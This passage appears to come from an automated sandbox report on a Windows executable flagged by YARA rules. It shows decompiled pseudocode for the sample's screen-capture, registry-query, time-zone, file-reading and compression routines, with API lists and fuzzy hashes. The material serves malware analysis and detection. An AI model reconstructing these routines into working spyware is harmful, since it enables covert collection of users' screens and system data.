					 *((intOrPtr*)(_a4 + 0x6af70)) = 0x10000;
				}
				 *((intOrPtr*)(_a4 + 0x6af6c)) = 0;
				E004091C0(_a4 + 0x4af70, 0, 0x1fffc);
				 *(_a4 + 0x6af98) =  *(0x4293b2 + _a8 * 8) & 0x0000ffff;
				 *(_a4 + 0x6af9c) =  *(0x4293b0 + _a8 * 8) & 0x0000ffff;
				 *(_a4 + 0x6afa0) =  *(0x4293b4 + _a8 * 8) & 0x0000ffff;
				 *(_a4 + 0x6af94) =  *(0x4293b6 + _a8 * 8) & 0x0000ffff;
				if(_a8 > 2) {
					if(_a8 >= 8) {
						 *_a12 =  *_a12 & 0x0000ffff | 0x00000002;
					}
				} else {
					 *_a12 =  *_a12 & 0x0000ffff | 0x00000004;
				}
				 *((intOrPtr*)(_a4 + 0x6af84)) = 0;
				 *((intOrPtr*)(_a4 + 0x6af74)) = 0;
				_v8 = 0x8000;
				_v8 = _v8 << 1;
				_t97 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0xc))))(_a4, _a4 + 0x1af70, _v8); // executed
				 *((intOrPtr*)(_a4 + 0x6af90)) = _t97;
				if( *((intOrPtr*)(_a4 + 0x6af90)) == 0) {
					L12:
					 *((intOrPtr*)(_a4 + 0x6af8c)) = 1;
					 *((intOrPtr*)(_a4 + 0x6af90)) = 0;
					return _t97;
				}
				_t97 = _a4;
				if( *((intOrPtr*)(_t97 + 0x6af90)) == 0xffffffff) {
					goto L12;
				}
				 *((intOrPtr*)(_a4 + 0x6af8c)) = 0;
				if( *((intOrPtr*)(_a4 + 0x6af90)) < 0x106) {
					E00415190(_a4); // executed
				}
				_t99 = _a4;
				 *((intOrPtr*)(_t99 + 0x6af7c)) = 0;
				_v8 = 0;
				while(_v8 < 2) {
					_t99 = ( *(_a4 + 0x6af7c) << 0x00000005 ^  *(_a4 + _v8 + 0x1af70) & 0x000000ff) & 0x00007fff;
					 *(_a4 + 0x6af7c) = _t99;
					_v8 = _v8 + 1;
				}
				return _t99;
			}







                                                                                                                              0x0041575a
                                                                                                                              0x00415768
                                                                                                                              0x00415762
                                                                                                                              0x00415762
                                                                                                                              0x00415762
                                                                                                                              0x0041577a
                                                                                                                              0x00415785
                                                                                                                              0x00415799
                                                                                                                              0x0041579e
                                                                                                                              0x004157ab
                                                                                                                              0x004157ab
                                                                                                                              0x004157b8
                                                                                                                              0x004157d3
                                                                                                                              0x004157e9
                                                                                                                              0x004157fd
                                                                                                                              0x00415811
                                                                                                                              0x00415825
                                                                                                                              0x0041582f
                                                                                                                              0x00415846
                                                                                                                              0x00415854
                                                                                                                              0x00415854
                                                                                                                              0x00415831
                                                                                                                              0x0041583d
                                                                                                                              0x0041583d
                                                                                                                              0x0041585a
                                                                                                                              0x00415867
                                                                                                                              0x00415871
                                                                                                                              0x0041587d
                                                                                                                              0x00415897
                                                                                                                              0x0041589f
                                                                                                                              0x004158af
                                                                                                                              0x004158bd
                                                                                                                              0x004158c0
                                                                                                                              0x004158cd
                                                                                                                              0x00000000
                                                                                                                              0x004158cd
                                                                                                                              0x004158b1
                                                                                                                              0x004158bb
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004158dc
                                                                                                                              0x004158f3
                                                                                                                              0x004158f9
                                                                                                                              0x004158fe
                                                                                                                              0x00415901
                                                                                                                              0x00415904
                                                                                                                              0x0041590e
                                                                                                                              0x00415920
                                                                                                                              0x00415941
                                                                                                                              0x00415949
                                                                                                                              0x0041591d
                                                                                                                              0x0041591d
                                                                                                                              0x00415954

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _memset
                                                                                                                              • String ID: bad pack level
                                                                                                                              • API String ID: 2102423945-4081416248
                                                                                                                              • Opcode ID: f6e3563300c5ab7fbcaddfc0a056989f21a9984ce5978ca3c77e3936c26ea850
                                                                                                                              • Instruction ID: 6f537c8d364d3cc6a5b59f8cb3aad8492bc240588aa9eb411482bf6566fffcb9
                                                                                                                              • Opcode Fuzzy Hash: f6e3563300c5ab7fbcaddfc0a056989f21a9984ce5978ca3c77e3936c26ea850
                                                                                                                              • Instruction Fuzzy Hash: 415136B4600208EBDB04DF54C454BEA3BB2BB85358F148279EC595F381C379AA92CF86
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041D650, Relevance: 3.1, APIs: 2, Instructions: 64COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 61%
                                                                                                                              			E0041D650(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v276;
				char _v540;
				signed int _t14;
				intOrPtr _t26;
				signed int _t43;

				_t42 = __esi;
				_t41 = __edi;
				_t31 = __ebx;
				_t14 =  *0x4301f4; // 0xe687535
				_v8 = _t14 ^ _t43;
				E004091C0( &_v540, 0, 0x104);
				E004091C0( &_v276, 0, 0x104);
				E0041A380( &_v540, 0x1a); // executed
				 *0x4328c4( &_v540, _a4);
				 *0x4328c4( &_v276,  &_v540);
				_t40 =  &_v276;
				 *0x4328c4( &_v276,  *0x432240);
				_t26 = E0041A6E0( &_v276); // executed
				if(_t26 != 0) {
					if(E0041C690(__ebx, __edi, __esi,  *0x432570) != 0) {
						_t40 = _a8;
						E0041D360(__ebx, __edi, __esi, 0x42945d,  &_v540, _a8);
					}
					_t26 = E0041C650();
				}
				return E00404354(_t26, _t31, _v8 ^ _t43, _t40, _t41, _t42);
			}









                                                                                                                              0x0041d650
                                                                                                                              0x0041d650
                                                                                                                              0x0041d650
                                                                                                                              0x0041d659
                                                                                                                              0x0041d660
                                                                                                                              0x0041d671
                                                                                                                              0x0041d687
                                                                                                                              0x0041d698
                                                                                                                              0x0041d6ab
                                                                                                                              0x0041d6bf
                                                                                                                              0x0041d6cc
                                                                                                                              0x0041d6d3
                                                                                                                              0x0041d6e0
                                                                                                                              0x0041d6ea
                                                                                                                              0x0041d6fd
                                                                                                                              0x0041d6ff
                                                                                                                              0x0041d70f
                                                                                                                              0x0041d714
                                                                                                                              0x0041d717
                                                                                                                              0x0041d717
                                                                                                                              0x0041d729

                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 0041D671
                                                                                                                              • _memset.LIBCMT ref: 0041D687
                                                                                                                                • Part of subcall function 0041A6E0: GetFileAttributesA.KERNEL32(?), ref: 0041A6EA
                                                                                                                                • Part of subcall function 0041C690: __wgetenv.LIBCMT ref: 0041C6A6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _memset$AttributesFile__wgetenv
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 149686187-0
                                                                                                                              • Opcode ID: e388588dc243cc71f73e8d93367709d7acdf1f86ee30b6db14fbab7ecf610c90
                                                                                                                              • Instruction ID: 49756a93a91f06ebf003bdda9be0c0177cda1d93663878ce3007f740a3bf9368
                                                                                                                              • Opcode Fuzzy Hash: e388588dc243cc71f73e8d93367709d7acdf1f86ee30b6db14fbab7ecf610c90
                                                                                                                              • Instruction Fuzzy Hash: 9511DDF6E4010CA7CB14EBA0DC86FDE7378AB18304F0406ADBA0957181EA74DBC4CBA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00416EC0, Relevance: 3.1, APIs: 2, Instructions: 55fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E00416EC0(void* __ecx, CHAR* _a4) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t39;
				intOrPtr _t49;
				intOrPtr _t50;

				_v16 = __ecx;
				 *(_v16 + 0x7c) = 0;
				 *(_v16 + 0x84) = 0;
				 *((char*)(_v16 + 0x80)) = 0;
				 *(_v16 + 0x78) = 0;
				 *(_v16 + 0x70) = 0;
				 *(_v16 + 0x90) = 0;
				 *(_v16 + 0x74) = 0;
				if(_a4 != 0) {
					_t31 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0, 0); // executed
					_v12 = _t31;
					if(_v12 != 0xffffffff) {
						_t32 = E00416D00(_t39, _v16, _t49, _t50, _v12, 0); // executed
						_v8 = _t32;
						if(_v8 == 0) {
							 *((char*)(_v16 + 0x80)) = 1;
							return 0;
						}
						CloseHandle(_v12);
						return _v8;
					}
					return 0x200;
				}
				return 0x10000;
			}











                                                                                                                              0x00416ec6
                                                                                                                              0x00416ecc
                                                                                                                              0x00416ed6
                                                                                                                              0x00416ee3
                                                                                                                              0x00416eed
                                                                                                                              0x00416ef7
                                                                                                                              0x00416f01
                                                                                                                              0x00416f0e
                                                                                                                              0x00416f19
                                                                                                                              0x00416f35
                                                                                                                              0x00416f3b
                                                                                                                              0x00416f42
                                                                                                                              0x00416f54
                                                                                                                              0x00416f59
                                                                                                                              0x00416f60
                                                                                                                              0x00416f74
                                                                                                                              0x00000000
                                                                                                                              0x00416f7b
                                                                                                                              0x00416f66
                                                                                                                              0x00000000
                                                                                                                              0x00416f6c
                                                                                                                              0x00000000
                                                                                                                              0x00416f44
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00416F35
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFile
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 823142352-0
                                                                                                                              • Opcode ID: 8f91cfc9fba5c32f4fbb937fef25f28ce00c47214f76ddcd96d078623111c708
                                                                                                                              • Instruction ID: b3512dad5386af28eed852f120763f789d947be643a00485d0e3b5c0498a9e9f
                                                                                                                              • Opcode Fuzzy Hash: 8f91cfc9fba5c32f4fbb937fef25f28ce00c47214f76ddcd96d078623111c708
                                                                                                                              • Instruction Fuzzy Hash: 3F210074E04208EFDB10DFA4D459BDDBBB0FB04304F1081AAE9156B3D1C7759A86DB44
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041AFE0, Relevance: 3.0, APIs: 2, Instructions: 46timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 19%
                                                                                                                              			E0041AFE0(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi) {
				signed int _v8;
				struct _TIME_ZONE_INFORMATION _v188;
				intOrPtr _v192;
				long _v196;
				signed int _t17;
				long _t23;
				intOrPtr _t29;
				intOrPtr _t31;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;

				_t39 = __esi;
				_t38 = __edi;
				_t36 = __edx;
				_t31 = __ebx;
				_t17 =  *0x4301f4; // 0xe687535
				_v8 = _t17 ^ _t40;
				_v192 =  *0x43288c( *0x4328dc(0, 0x104));
				_v188.Bias = 0;
				E004091C0( &(_v188.StandardName), 0, 0xa8);
				_t23 = GetTimeZoneInformation( &_v188); // executed
				_v196 = _t23;
				if(_v196 != 0xffffffff) {
					asm("cdq");
					_t36 =  *0x4324cc;
					 *0x432768(_v192,  *0x4324cc,  ~(_v188.Bias) / 0x3c);
					_t29 = _v192;
				} else {
					_t29 = _v192;
				}
				return E00404354(_t29, _t31, _v8 ^ _t40, _t36, _t38, _t39);
			}














                                                                                                                              0x0041afe0
                                                                                                                              0x0041afe0
                                                                                                                              0x0041afe0
                                                                                                                              0x0041afe0
                                                                                                                              0x0041afe9
                                                                                                                              0x0041aff0
                                                                                                                              0x0041b007
                                                                                                                              0x0041b00d
                                                                                                                              0x0041b025
                                                                                                                              0x0041b034
                                                                                                                              0x0041b03a
                                                                                                                              0x0041b047
                                                                                                                              0x0041b059
                                                                                                                              0x0041b062
                                                                                                                              0x0041b070
                                                                                                                              0x0041b079
                                                                                                                              0x0041b049
                                                                                                                              0x0041b049
                                                                                                                              0x0041b049
                                                                                                                              0x0041b08c

                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 0041B025
                                                                                                                              • GetTimeZoneInformation.KERNEL32(00000000), ref: 0041B034
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: InformationTimeZone_memset
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1673874568-0
                                                                                                                              • Opcode ID: f04ae1eec3cd3d8f71b6e0b8e1ba63e6537d3239d06e5d4a1eda5fe36536eada
                                                                                                                              • Instruction ID: a38f8acdfa9d2068cb0a8f8de2786d5a5190629af5dbd92f4f3d6e32fc3f7771
                                                                                                                              • Opcode Fuzzy Hash: f04ae1eec3cd3d8f71b6e0b8e1ba63e6537d3239d06e5d4a1eda5fe36536eada
                                                                                                                              • Instruction Fuzzy Hash: F0116170A00318DBEB54EF64DD49F99B7B9EB08304F0042A9E909E7291DB749E88CF56
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041A9D0, Relevance: 3.0, APIs: 2, Instructions: 44COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 58%
                                                                                                                              			E0041A9D0() {
				char _v8;
				int _v12;
				int _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				int _v36;
				int _v40;

				E00403FD0( &_v36, 0, 0, 0);
				_v36 = 1;
				_v32 = 0;
				_v28 = 0;
				_v24 = 0;
				 *0x4328b0( &_v8,  &_v36, 0); // executed
				_v40 = 0;
				_v20 = 0;
				_v16 = GetSystemMetrics(0);
				_v12 = GetSystemMetrics(1);
				E0041A940(_v40, _v20, _v16 - _v40, _v12 - _v20); // executed
				return  *0x432890(_v8);
			}












                                                                                                                              0x0041a9df
                                                                                                                              0x0041a9e4
                                                                                                                              0x0041a9eb
                                                                                                                              0x0041a9f2
                                                                                                                              0x0041a9f9
                                                                                                                              0x0041aa0a
                                                                                                                              0x0041aa10
                                                                                                                              0x0041aa17
                                                                                                                              0x0041aa26
                                                                                                                              0x0041aa31
                                                                                                                              0x0041aa4a
                                                                                                                              0x0041aa5f

                                                                                                                              APIs
                                                                                                                              • GetSystemMetrics.USER32(00000000), ref: 0041AA20
                                                                                                                              • GetSystemMetrics.USER32(00000001), ref: 0041AA2B
                                                                                                                                • Part of subcall function 0041A940: CreateCompatibleDC.GDI32(00000000), ref: 0041A948
                                                                                                                                • Part of subcall function 0041A940: GetDC.USER32(00000000), ref: 0041A95B
                                                                                                                                • Part of subcall function 0041A940: CreateCompatibleBitmap.GDI32(00000000), ref: 0041A962
                                                                                                                                • Part of subcall function 0041A940: SelectObject.GDI32(?,?), ref: 0041A973
                                                                                                                                • Part of subcall function 0041A940: GetDC.USER32(00000000), ref: 0041A988
                                                                                                                                • Part of subcall function 0041A940: BitBlt.GDI32(?,00000000,00000000,?,?,00000000), ref: 0041A99F
                                                                                                                                • Part of subcall function 0041A940: DeleteObject.GDI32(?), ref: 0041A9B7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CompatibleCreateMetricsObjectSystem$BitmapDeleteSelect
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2392011222-0
                                                                                                                              • Opcode ID: 2a24e5050d5877b703e70a7b37d0a216ffb4f14afde7beb3bbab4e31ddefb657
                                                                                                                              • Instruction ID: 5a6354b42c1b56eb3e3fbefa3fa20da0826f8f0706aa57b64b182fa8f0be3d4e
                                                                                                                              • Opcode Fuzzy Hash: 2a24e5050d5877b703e70a7b37d0a216ffb4f14afde7beb3bbab4e31ddefb657
                                                                                                                              • Instruction Fuzzy Hash: 1211E1B5D00209AFDB04EFD4DD49BEEBBB8FB08704F104159E505B7280D7B56A44CBA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041B0E0, Relevance: 3.0, APIs: 2, Instructions: 38registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 68%
                                                                                                                              			E0041B0E0() {
				void* _v8;
				int _v12;
				signed int _v16;
				char _v284;
				signed int _t10;
				long _t13;
				intOrPtr _t20;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t10 =  *0x4301f4; // 0xe687535
				_v16 = _t10 ^ _t29;
				_v12 = 0xff;
				_t13 = RegOpenKeyExA(0x80000002,  *0x432594, 0, 0x20119,  &_v8); // executed
				if(_t13 == 0) {
					_t25 = _v8;
					RegQueryValueExA(_v8,  *0x432224, 0, 0,  &_v284,  &_v12); // executed
				}
				 *0x432858();
				return E00404354( &_v284, _t20, _v16 ^ _t29, _t25, _t27, _t28, _v8);
			}













                                                                                                                              0x0041b0e9
                                                                                                                              0x0041b0f0
                                                                                                                              0x0041b0f3
                                                                                                                              0x0041b111
                                                                                                                              0x0041b119
                                                                                                                              0x0041b131
                                                                                                                              0x0041b135
                                                                                                                              0x0041b135
                                                                                                                              0x0041b13f
                                                                                                                              0x0041b158

                                                                                                                              APIs
                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020119,?), ref: 0041B111
                                                                                                                              • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,000000FF), ref: 0041B135
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: OpenQueryValue
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4153817207-0
                                                                                                                              • Opcode ID: 9854777b51662a1b4163059b4eb2929d234a9bfc70f81d67747477c2dc7c09a1
                                                                                                                              • Instruction ID: e9006c33b1f3d5608eeeefafc4b86fdc27a5baa45399712a1b3837a38b7680d1
                                                                                                                              • Opcode Fuzzy Hash: 9854777b51662a1b4163059b4eb2929d234a9bfc70f81d67747477c2dc7c09a1
                                                                                                                              • Instruction Fuzzy Hash: F0018175A0020DBFDB08DF94ED56FEEB3B8EB48700F0041A9A605A7280EB746A44CF94
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041B260, Relevance: 3.0, APIs: 2, Instructions: 38registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 68%
                                                                                                                              			E0041B260() {
				void* _v8;
				int _v12;
				signed int _v16;
				char _v284;
				signed int _t10;
				long _t13;
				intOrPtr _t20;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t10 =  *0x4301f4; // 0xe687535
				_v16 = _t10 ^ _t29;
				_v12 = 0xff;
				_t13 = RegOpenKeyExA(0x80000002,  *0x4323d8, 0, 0x20119,  &_v8); // executed
				if(_t13 == 0) {
					_t25 = _v8;
					RegQueryValueExA(_v8,  *0x432480, 0, 0,  &_v284,  &_v12); // executed
				}
				 *0x432858();
				return E00404354( &_v284, _t20, _v16 ^ _t29, _t25, _t27, _t28, _v8);
			}













                                                                                                                              0x0041b269
                                                                                                                              0x0041b270
                                                                                                                              0x0041b273
                                                                                                                              0x0041b291
                                                                                                                              0x0041b299
                                                                                                                              0x0041b2b1
                                                                                                                              0x0041b2b5
                                                                                                                              0x0041b2b5
                                                                                                                              0x0041b2bf
                                                                                                                              0x0041b2d8

                                                                                                                              APIs
                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020119,?), ref: 0041B291
                                                                                                                              • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,000000FF), ref: 0041B2B5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: OpenQueryValue
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4153817207-0
                                                                                                                              • Opcode ID: 1cf1f1c1e2cc4bbd7f63910e5a42fc97cd9555917660760b7f8267a608a4c158
                                                                                                                              • Instruction ID: 6be965c5c923288808e501c7c14758c08100337a4ead401ed5fa8a82468b7490
                                                                                                                              • Opcode Fuzzy Hash: 1cf1f1c1e2cc4bbd7f63910e5a42fc97cd9555917660760b7f8267a608a4c158
                                                                                                                              • Instruction Fuzzy Hash: 42016275A0020DBFDB04DB94DD46FEEB3B8EB48700F1041A9A605A7280DA746A448B94
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041B460, Relevance: 3.0, APIs: 2, Instructions: 38registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 68%
                                                                                                                              			E0041B460() {
				void* _v8;
				int _v12;
				signed int _v16;
				char _v284;
				signed int _t10;
				long _t13;
				intOrPtr _t20;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t10 =  *0x4301f4; // 0xe687535
				_v16 = _t10 ^ _t29;
				_v12 = 0xff;
				_t13 = RegOpenKeyExA(0x80000002,  *0x4321e0, 0, 0x20119,  &_v8); // executed
				if(_t13 == 0) {
					_t25 = _v8;
					RegQueryValueExA(_v8,  *0x432574, 0, 0,  &_v284,  &_v12); // executed
				}
				 *0x432858();
				return E00404354( &_v284, _t20, _v16 ^ _t29, _t25, _t27, _t28, _v8);
			}













                                                                                                                              0x0041b469
                                                                                                                              0x0041b470
                                                                                                                              0x0041b473
                                                                                                                              0x0041b491
                                                                                                                              0x0041b499
                                                                                                                              0x0041b4b1
                                                                                                                              0x0041b4b5
                                                                                                                              0x0041b4b5
                                                                                                                              0x0041b4bf
                                                                                                                              0x0041b4d8

                                                                                                                              APIs
                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020119,?), ref: 0041B491
                                                                                                                              • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,000000FF), ref: 0041B4B5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: OpenQueryValue
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4153817207-0
                                                                                                                              • Opcode ID: 5543fc9e14794ebc2460d778d5a0a552370f5e5fa382d45e8362d85d34f91f06
                                                                                                                              • Instruction ID: 73bd3a17dc5699dde7e36c61eca224ba4d86d069b81c3616f5d6a749abcba002
                                                                                                                              • Opcode Fuzzy Hash: 5543fc9e14794ebc2460d778d5a0a552370f5e5fa382d45e8362d85d34f91f06
                                                                                                                              • Instruction Fuzzy Hash: D7018175A0020CBFDB08DFA4DD46FEEB3B8EB48700F0041ADE605A7280DB746A448F98
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00405EA3, Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 89%
                                                                                                                              			E00405EA3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t20;
				signed int _t22;
				intOrPtr _t32;
				void* _t33;
				intOrPtr _t35;

				_push(0xc);
				_push(0x42dd10);
				E00408C20(__ebx, __edi, __esi);
				 *(_t33 - 0x1c) =  *(_t33 - 0x1c) | 0xffffffff;
				_t32 =  *((intOrPtr*)(_t33 + 8));
				_t35 = _t32;
				_t36 = _t35 != 0;
				if(_t35 != 0) {
					__eflags =  *(_t32 + 0xc) & 0x00000040;
					if(( *(_t32 + 0xc) & 0x00000040) == 0) {
						E004099B9(_t32);
						 *(_t33 - 4) =  *(_t33 - 4) & 0x00000000;
						_t20 = E00405E36(__ebx, __edx, _t32); // executed
						 *(_t33 - 0x1c) = _t20;
						 *(_t33 - 4) = 0xfffffffe;
						E00405F0F(_t32);
					} else {
						_t9 = _t32 + 0xc;
						 *_t9 =  *(_t32 + 0xc) & 0x00000000;
						__eflags =  *_t9;
					}
					_t22 =  *(_t33 - 0x1c);
				} else {
					 *((intOrPtr*)(E00405A49(_t36))) = 0x16;
					_t22 = E00407461() | 0xffffffff;
				}
				return E00408C65(_t22);
			}








                                                                                                                              0x00405ea3
                                                                                                                              0x00405ea5
                                                                                                                              0x00405eaa
                                                                                                                              0x00405eaf
                                                                                                                              0x00405eb5
                                                                                                                              0x00405eb8
                                                                                                                              0x00405ebd
                                                                                                                              0x00405ebf
                                                                                                                              0x00405ed6
                                                                                                                              0x00405eda
                                                                                                                              0x00405eea
                                                                                                                              0x00405ef0
                                                                                                                              0x00405ef5
                                                                                                                              0x00405efb
                                                                                                                              0x00405efe
                                                                                                                              0x00405f05
                                                                                                                              0x00405edc
                                                                                                                              0x00405edc
                                                                                                                              0x00405edc
                                                                                                                              0x00405edc
                                                                                                                              0x00405edc
                                                                                                                              0x00405ee0
                                                                                                                              0x00405ec1
                                                                                                                              0x00405ec6
                                                                                                                              0x00405ed1
                                                                                                                              0x00405ed1
                                                                                                                              0x00405ee8

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00405A49: __getptd_noexit.LIBCMT ref: 00405A49
                                                                                                                              • __lock_file.LIBCMT ref: 00405EEA
                                                                                                                                • Part of subcall function 004099B9: __lock.LIBCMT ref: 004099DE
                                                                                                                              • __fclose_nolock.LIBCMT ref: 00405EF5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2800547568-0
                                                                                                                              • Opcode ID: 3fc3483712a525cd96c649c7fe8882c4f1071fa44ab2443346d3945ffceb5c37
                                                                                                                              • Instruction ID: 1319f6abd8bd31aeb109ac581f584733085f37c6932f77d10f7e7e49bf8bce39
                                                                                                                              • Opcode Fuzzy Hash: 3fc3483712a525cd96c649c7fe8882c4f1071fa44ab2443346d3945ffceb5c37
                                                                                                                              • Instruction Fuzzy Hash: 76F09630915B15DAD720AB76D80675F7AA0EF00338F20863FE4A5B61D1CB7C5A019E9D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00405EA3, Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 89%
                                                                                                                              			E00405EA3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t20;
				signed int _t22;
				intOrPtr _t32;
				void* _t33;
				intOrPtr _t35;

				_push(0xc);
				_push(0x42dd10);
				E00408C20(__ebx, __edi, __esi);
				 *(_t33 - 0x1c) =  *(_t33 - 0x1c) | 0xffffffff;
				_t32 =  *((intOrPtr*)(_t33 + 8));
				_t35 = _t32;
				_t36 = _t35 != 0;
				if(_t35 != 0) {
					__eflags =  *(_t32 + 0xc) & 0x00000040;
					if(( *(_t32 + 0xc) & 0x00000040) == 0) {
						E004099B9(_t32);
						 *(_t33 - 4) =  *(_t33 - 4) & 0x00000000;
						_t20 = E00405E36(__ebx, __edx, _t32); // executed
						 *(_t33 - 0x1c) = _t20;
						 *(_t33 - 4) = 0xfffffffe;
						E00405F0F(_t32);
					} else {
						_t9 = _t32 + 0xc;
						 *_t9 =  *(_t32 + 0xc) & 0x00000000;
						__eflags =  *_t9;
					}
					_t22 =  *(_t33 - 0x1c);
				} else {
					 *((intOrPtr*)(E00405A49(_t36))) = 0x16;
					_t22 = E00407461() | 0xffffffff;
				}
				return E00408C65(_t22);
			}








                                                                                                                              0x00405ea3
                                                                                                                              0x00405ea5
                                                                                                                              0x00405eaa
                                                                                                                              0x00405eaf
                                                                                                                              0x00405eb5
                                                                                                                              0x00405eb8
                                                                                                                              0x00405ebd
                                                                                                                              0x00405ebf
                                                                                                                              0x00405ed6
                                                                                                                              0x00405eda
                                                                                                                              0x00405eea
                                                                                                                              0x00405ef0
                                                                                                                              0x00405ef5
                                                                                                                              0x00405efb
                                                                                                                              0x00405efe
                                                                                                                              0x00405f05
                                                                                                                              0x00405edc
                                                                                                                              0x00405edc
                                                                                                                              0x00405edc
